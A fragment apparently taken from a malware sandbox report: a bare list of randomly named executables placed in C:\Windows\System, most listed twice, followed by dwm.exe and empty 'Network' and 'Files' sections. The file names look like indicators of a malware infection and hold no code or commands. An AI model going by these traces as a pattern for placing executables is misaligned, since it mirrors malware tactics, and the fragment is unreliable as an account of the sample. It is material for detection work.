C:\Windows\System\qnWzngy.exe

C:\Windows\System\jGvFMri.exe

C:\Windows\System\jGvFMri.exe

C:\Windows\System\gnfQBNZ.exe

C:\Windows\System\gnfQBNZ.exe

C:\Windows\System\IypUiBm.exe

C:\Windows\System\IypUiBm.exe

C:\Windows\System\sjqdbAO.exe

C:\Windows\System\sjqdbAO.exe

C:\Windows\System\WJQNrZl.exe

C:\Windows\System\WJQNrZl.exe

C:\Windows\System\tYRxgCL.exe

C:\Windows\System\tYRxgCL.exe

C:\Windows\System\VWFlxgG.exe

C:\Windows\System\VWFlxgG.exe

C:\Windows\System\ibcvovB.exe

C:\Windows\System\ibcvovB.exe

C:\Windows\System\DTgKlLe.exe

C:\Windows\System\DTgKlLe.exe

C:\Windows\System\eQMKrOM.exe

C:\Windows\System\eQMKrOM.exe

C:\Windows\System\JRITmTr.exe

C:\Windows\System\JRITmTr.exe

C:\Windows\System\cJcmLWZ.exe

C:\Windows\System\cJcmLWZ.exe

C:\Windows\System\JddfMjX.exe

C:\Windows\System\JddfMjX.exe

C:\Windows\System\WNCXCsg.exe

C:\Windows\System\WNCXCsg.exe

C:\Windows\System\wuEkhIN.exe

C:\Windows\System\wuEkhIN.exe

C:\Windows\System\uLtIwSh.exe

C:\Windows\System\uLtIwSh.exe

C:\Windows\System\oOZHTcx.exe

C:\Windows\System\oOZHTcx.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

Network


Files
